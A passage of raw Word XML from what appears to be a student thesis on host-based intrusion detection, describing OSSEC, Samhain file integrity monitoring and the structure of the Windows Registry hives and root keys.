        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:instrText xml:space="preserve"> CITATION Fre08 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(3)</w:t>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00FA2604">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BA1DEF">
        <w:t xml:space="preserve">A HIDS can work as a software that monitors events from inside the system rather than monitor the and inspect the network behaviors. Since from a viewpoint of the network, traffics that travel through network link might be encrypted and hard to be inspect. However, to OSSEC, any network traffics always </w:t>
      </w:r>
      <w:r w:rsidR="00EE0D90">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00BA1DEF">
        <w:t xml:space="preserve"> plaintext in the system viewpoint. Furthermore, OSSEC has a very sophisticated engine that can monitor system activities for recognize and alert upon any file system change, rootkit or malware infection. OSSEC also monitors log file, capture suspicious activities</w:t>
      </w:r>
      <w:r w:rsidR="00D03D21">
        <w:t xml:space="preserve"> happening</w:t>
      </w:r>
      <w:r w:rsidR="00BA1DEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D03D21">
        <w:t xml:space="preserve">in special parts of the system and alert immediately for respond team to interrupt </w:t>
      </w:r>
      <w:r w:rsidR="00896C1B">
        <w:t>and prevent the attack on time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB778B" w:rsidRDefault="00896C1B" w:rsidP="00896C1B">
      <w:r>
        <w:t>OSSEC comes in a deployment with two main parts: a client agent part and a command and control server part. After has been deployed in the client machine, OSSEC agent does the monitor task.</w:t>
      </w:r>
      <w:r w:rsidR="0042288E">
        <w:t xml:space="preserve"> OSSEC agent can work on multiplatform, which means we can expand its protection to any host in our ne</w:t>
      </w:r>
      <w:r w:rsidR="00FB2DC8">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="0042288E">
        <w:t>work.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The agent communicates with its server at UDP protocol using port 1514. When an event is</w:t>
      </w:r>
      <w:r w:rsidR="00D03D21">
        <w:t xml:space="preserve"> detected for which an alert to a system or security administrator needs to be sent, OSSEC can use one of several methods, including emails, SMS messages, pagers, etc </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="290561880"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:instrText xml:space="preserve"> CITATION Fre08 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(3)</w:t>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D03D21">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00580A9D">
        <w:t>OSSEC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> agent</w:t>
      </w:r>
      <w:r w:rsidR="00580A9D">
        <w:t xml:space="preserve"> can also takes actions for preventing the attack. For example, within an DDOS attack, OSSEC can insert rule into firewall that can be used to prevent the attack immediately. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OSSEC server plays a role </w:t>
      </w:r>
      <w:r w:rsidR="008D132E">
        <w:t>as a distributed log collector</w:t>
      </w:r>
      <w:r w:rsidR="00FB778B">
        <w:t>, it store</w:t>
      </w:r>
      <w:r w:rsidR="00F85F5E">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00FB778B">
        <w:t xml:space="preserve"> log received from the agents and alert upon those received logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB778B" w:rsidRDefault="00FB778B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D03D21" w:rsidRDefault="00FB778B" w:rsidP="00896C1B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A single OSSEC server can monitor many OSSEC agents. In case we want to connect many OSSCE server together, we can configure an agent inside the server. (see Figure 2-1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB778B" w:rsidRDefault="00FB778B" w:rsidP="00FB778B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75543857" wp14:editId="369AB9DC">
            <wp:extent cx="5581650" cy="3128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650" cy="3128010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B41F3B" w:rsidRPr="00927DA6" w:rsidRDefault="00FB778B" w:rsidP="00927DA6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc483834777"/>
      <w:bookmarkStart w:id="30" w:name="_Toc485303760"/>
      <w:r w:rsidRPr="00927DA6">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2</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1</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00927DA6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: OSSEC Processes in a “Server-Agent” Installation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00FB778B" w:rsidRPr="00927DA6" w:rsidRDefault="00927DA6" w:rsidP="00927DA6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00927DA6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>From:</w:t>
      </w:r>
      <w:r w:rsidR="00FB778B" w:rsidRPr="00927DA6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://www.ossec.net/ossec-</w:t>
      </w:r>
      <w:r w:rsidRPr="00927DA6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>docs/ossec-hids_oahmet_eng.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB778B" w:rsidRDefault="00955443" w:rsidP="00B41F3B">
      <w:r>
        <w:t>OSSEC Open Source Security has become and high qualit</w:t>
      </w:r>
      <w:r w:rsidR="008B6D53">
        <w:t>y Opensource Host IDS software that is trusted and used in protecting many large campuses and enterprises. Although there are few drawbacks, OSSEC has been trusted to be improved and upgrade their abilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D132E" w:rsidRDefault="008D132E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B6D53" w:rsidRDefault="00514FF3" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc485303716"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Samhain</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="00850E34" w:rsidRDefault="00514FF3" w:rsidP="00850E34">
      <w:r>
        <w:t xml:space="preserve">Samhain is a multi-platform, opensource HIDS for POSIX </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="330961426"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00050E57">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00050E57">
            <w:instrText xml:space="preserve"> CITATION Nel14 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00050E57">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(4)</w:t>
          </w:r>
          <w:r w:rsidR="00050E57">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="0085113D">
        <w:t xml:space="preserve">. When </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0085113D">
        <w:t xml:space="preserve">an attacker </w:t>
      </w:r>
      <w:r w:rsidR="004534AE">
        <w:t>compromises</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0085113D">
        <w:t xml:space="preserve"> to our system, he wants to modify the functions of the system to work in the wait that suitable for his purpose. Therefore, beside service and network operation, his job is to modify system files those are essential for the operation. System administrators should be alert as soon as possible upon any change in any system files.</w:t>
      </w:r>
      <w:r w:rsidR="00F85F5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D0BB9" w:rsidRDefault="00F85F5E" w:rsidP="00850E34">
      <w:r>
        <w:t xml:space="preserve">Samhain has been developed mainly </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>for the purpose of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> File Integrity Monitoring (FIM).</w:t>
      </w:r>
      <w:r w:rsidR="00D56635">
        <w:t xml:space="preserve"> Like most IDS, Samhain can also be centrally managed via a web console.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Samhain has configurable rules that administrator can configure for the baseline of operations in FIM. When the rules are set, the tool then scan all the pre-defined file periodically, depends on configurations and then whether any change occurs, the tool capture it and sends alert immediately. </w:t>
      </w:r>
      <w:r w:rsidR="002D0BB9">
        <w:t>Samhain supports for various reporting options such as log file, direct e-mail or custom script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A3225" w:rsidRDefault="002D0BB9" w:rsidP="000A3225">
      <w:r>
        <w:t xml:space="preserve">There are many HIDS present on the market too day, but what makes Samhain stand out of the crowd is that Samhain focus on FIM as a point for development. Samhain does not try to become a full feature and multi-function HIDS or SIEM. Samhain’s FIM function has many features that it becomes the most popular FIM software that is trusted and used worldwide. Samhain can even be used to support the Payment Card Industry Data Security Standard (PCI DSS) </w:t>
      </w:r>
      <w:r w:rsidR="00003BB7">
        <w:t>(or other compliance policies) that require the monitor of growing log files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00003BB7">
        <w:t>To minimize the impact on the disk IO and get immediate notifications, Samhain can leverage the inotify function in Li</w:t>
      </w:r>
      <w:r w:rsidR="004534AE">
        <w:t>nux kernel system. Inotify is a</w:t>
      </w:r>
      <w:r w:rsidR="00003BB7">
        <w:t xml:space="preserve"> Unix API provides a mechanism for monitoring filesystem events </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1239133370"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00003BB7">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00003BB7">
            <w:instrText xml:space="preserve"> CITATION Lin \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00003BB7">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00003BB7">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(5)</w:t>
          </w:r>
          <w:r w:rsidR="00003BB7">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00003BB7">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000A3225">
        <w:t xml:space="preserve">Samhain also implement various stealth techniques that will be used to obfuscate the binary and configuration data. Further obfuscation could be implement in case an attacker gets on to the system without let him know FIM is running. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85F5E" w:rsidRPr="00850E34" w:rsidRDefault="000A3225" w:rsidP="00850E34">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D0BB9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F85F5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00095BB2" w:rsidRDefault="00095BB2">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B6D53" w:rsidRDefault="00095BB2" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc485303717"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Background</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00AC6729" w:rsidRDefault="00E41963" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc485303718"/>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00AC6729">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Registry</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="007A6F8C" w:rsidRPr="007A6F8C" w:rsidRDefault="007A6F8C" w:rsidP="007A6F8C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B7F94" w:rsidRDefault="00E41963" w:rsidP="002B7F94">
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="007A6F8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="007A6F8C">
        <w:t xml:space="preserve"> is a hierarchical database that contains critical data for the operation of </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="007A6F8C">
        <w:t xml:space="preserve"> systems  </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-62724857"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C111F5">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:instrText xml:space="preserve"> CITATION Mic1 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(5)</w:t>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007A6F8C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C111F5">
        <w:t xml:space="preserve">The data stored in </w:t>
      </w:r>
      <w:r>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00C111F5">
        <w:t xml:space="preserve"> follows a tree format. Each node is called a “key”, and each key can store many subordinate keys (sub-keys) and </w:t>
      </w:r>
      <w:r w:rsidR="002B7F94">
        <w:t>each sub-key</w:t>
      </w:r>
      <w:r w:rsidR="00C111F5">
        <w:t xml:space="preserve"> stores many data entries called “Values”</w:t>
      </w:r>
      <w:r w:rsidR="002B7F94">
        <w:t>. Some applications only require the presence of a key, other applications read into the keys and query the values stored in them. A key can store any value and a value can be in any type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C11BF" w:rsidRDefault="000C11BF" w:rsidP="002B7F94">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inside the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC114D" w:rsidRPr="00AC114D" w:rsidRDefault="00E41963" w:rsidP="00AC114D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00AC114D" w:rsidRPr="00AC114D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Hive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001561F9" w:rsidRDefault="000C11BF" w:rsidP="000C11BF">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is not a large file that is stored in disk, but it is a group of separated files called “hives”. A hive</w:t>
      </w:r>
      <w:r w:rsidR="00525B3D">
        <w:t xml:space="preserve"> is a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tree format data structure which has a key serving as the tree root, and each sub-key is a node of that tree </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="328416527"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009862B5">
            <w:instrText xml:space="preserve">CITATION Mic97 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009862B5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(6)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>. We might think that each key is completely is</w:t>
      </w:r>
      <w:r w:rsidR="001561F9">
        <w:t xml:space="preserve">olated with other key, however, there are correlations between </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="001561F9">
        <w:t xml:space="preserve"> keys in the system. Table</w:t>
      </w:r>
      <w:r w:rsidR="00430F22">
        <w:t xml:space="preserve"> 2.1</w:t>
      </w:r>
      <w:r w:rsidR="001561F9">
        <w:t xml:space="preserve"> shows the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="001561F9">
        <w:t xml:space="preserve"> keys and their </w:t>
      </w:r>
      <w:r w:rsidR="009067EA">
        <w:t>correlations</w:t>
      </w:r>
      <w:r w:rsidR="001561F9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3380"/>
        <w:gridCol w:w="5390"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F6B4C" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="000F6B4C" w:rsidRPr="00430F22" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00430F22">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="000F6B4C" w:rsidRPr="00430F22" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00430F22">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F6B4C" w:rsidTr="009067EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000F6B4C" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HKEY_CLASSES_ROOT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000F6B4C" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>Symbolic link to HKEY_LOCAL_MACHINE \SOFTWARE \Classes</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009067EA" w:rsidTr="009067EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>HKEY_CURRENT_USER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRPr="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>Symbolic link to a key under HKEY_USERS representing a user's profile hive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009067EA" w:rsidTr="009067EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>HKEY_LOCAL_MACHINE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRPr="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>Placeholder with no corresponding physical hive. This key contains other keys that are hives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009067EA" w:rsidTr="009067EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>HKEY_USERS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRPr="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>Placeholder that contains the user-profile hives of logged-on accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009067EA" w:rsidTr="009067EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>HKEY_CURRENT_CONFIG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRPr="009067EA" w:rsidRDefault="009067EA" w:rsidP="009067EA">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>Symbolic link to the key of the current hardware profile under HKEY_LOCAL_MACHINE \SYSTEM CurrentControlSet\ Control\IDConfigDB\Hardware Profiles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009067EA" w:rsidTr="009067EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>HKEY_DYN_DATA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRPr="009067EA" w:rsidRDefault="009067EA" w:rsidP="00430F22">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>Placeholder for performance data lookups. This key has no corresponding physical hive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00430F22" w:rsidRDefault="00430F22" w:rsidP="00430F22">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc485303797"/>
      <w:r w:rsidRPr="00430F22">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1</w:t>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00430F22">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F22">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> keys and their correlations.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="00430F22" w:rsidRDefault="00430F22" w:rsidP="00430F22">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
